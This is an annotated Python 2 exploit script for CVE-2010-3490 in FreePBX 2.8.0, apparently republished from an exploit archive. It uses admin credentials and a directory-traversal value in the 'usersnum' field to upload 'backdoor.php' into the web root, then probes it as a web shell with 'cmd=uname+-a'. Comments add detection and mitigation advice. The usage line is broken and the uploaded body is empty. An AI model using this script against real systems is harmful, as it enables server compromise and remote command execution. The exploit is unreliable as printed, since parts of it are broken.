CVE-2010-3490_FreePBX_2.8.0任意文件創建漏洞

# CVE-2010-3490 FreePBX 2.8.0任意文件創建漏洞
==EXP==

import requests
import random
import string
import sys
 
# Original advisory : http://www.exploit-db.com/exploits/15098/
 
# Proof-of-concept for CVE-2010-3490: an authenticated administrator can make
# the FreePBX recordings upload write a file outside the recordings directory,
# because the `usersnum` form field is used in the destination path.
# The script is Python 2 (`xrange`, `print` statement) and expects exactly
# three arguments: the admin base URL, a username and a password.
#
# Defender notes:
#   - Valid admin credentials are required (HTTP basic auth is sent on every
#     request), so exposure is limited to whoever can reach and log in to the
#     admin interface. Restrict that interface to management networks.
#   - Detection: POSTs to config.php?type=setup&display=recordings whose
#     `usersnum` field contains "../", and new "*-ivrrecording.php" files
#     appearing under the admin web root.
#   - Mitigation: run a FreePBX release later than 2.8.0, and make sure the
#     web-server account cannot write to directories that are served as PHP.
print("devloop exploit for FreePBX <= 2.8.0 (CVE-2010-3490)")
if len(sys.argv) != 4:
    # NOTE(review): the usage text is never passed through .format() and the
    # argument names are missing; they were probably lost when the page was
    # extracted (angle-bracket placeholders are a likely candidate).
    print("Usage: {0}   ")
    sys.exit()
 
BASE = sys.argv[1]  # base URL of the admin interface
USER = sys.argv[2]  # admin username
PASS = sys.argv[3]  # admin password
KEYW = "devloop"    # prefix of the file name the upload is expected to create
 
# Normalise the base URL so relative paths can simply be appended to it.
if not BASE.endswith("/"):
    BASE += "/"
 
sess = requests.session()
creds = (USER, PASS)
 
# Step 1: confirm the credentials work. The "Logged in:" marker is looked up
# in the response body of config.php.
r = sess.get(BASE + "config.php", auth=creds)
if "Logged in:" in r.content:
    print("[+] Connection successful")
else:
    print("[!] Unable to login... check credentials and url")
    sys.exit()
 
# Step 2: build the "save recording" form.
data = {
    'action': 'recorded',
    'display': 'recordings',
    # The directory traversal: this field is presumably meant to hold an
    # extension number. The server-side fix is to reject anything that is not
    # a plain number before it is used in a path.
    'usersnum': '../../../../../var/www/html/admin/{0}'.format(KEYW),
    # Random 10-character recording name built from string.hexdigits.
    'rname': "".join([random.choice(string.hexdigits) for _ in xrange(10)]),
    'Submit': 'Save'
    }
 
# The uploaded file body is empty in this listing (possibly removed when the
# page was published), so the script as shown only demonstrates that a file
# with a .php name can be created under the admin web root.
content = ""
files = {
        'ivrfile': ('backdoor.php', content, 'application/octet-stream')
        }
# Referer of the recordings page; presumably the application checks it.
hdrs = {"referer": BASE + "config.php?type=setup&display=recordings"}
 
# Step 3: submit the multipart form. This single request is the one worth
# alerting on in web-server and WAF logs.
r = sess.post(BASE + "config.php?type=setup&display=recordings",
        data=data,
        files=files,
        auth=creds,
        headers=hdrs)
 
# Step 4: check whether the file was created. The URL implies the server names
# the result "<usersnum>-ivrrecording" plus the uploaded file's extension.
# A 200 here means the file exists under the admin directory; treat such a
# host as compromised and review it for other dropped files.
print("[i] Testing shell at address {0}{1}-ivrrecording.php".format(BASE, KEYW))
r = requests.get(BASE + KEYW + "-ivrrecording.php?cmd=uname+-a", auth=creds)
if r.status_code != 200:
    print("[-] Received HTTP code {0} for this url".format(r.status_code))
else:
    print("HTTP 200 OK")
    print r.content
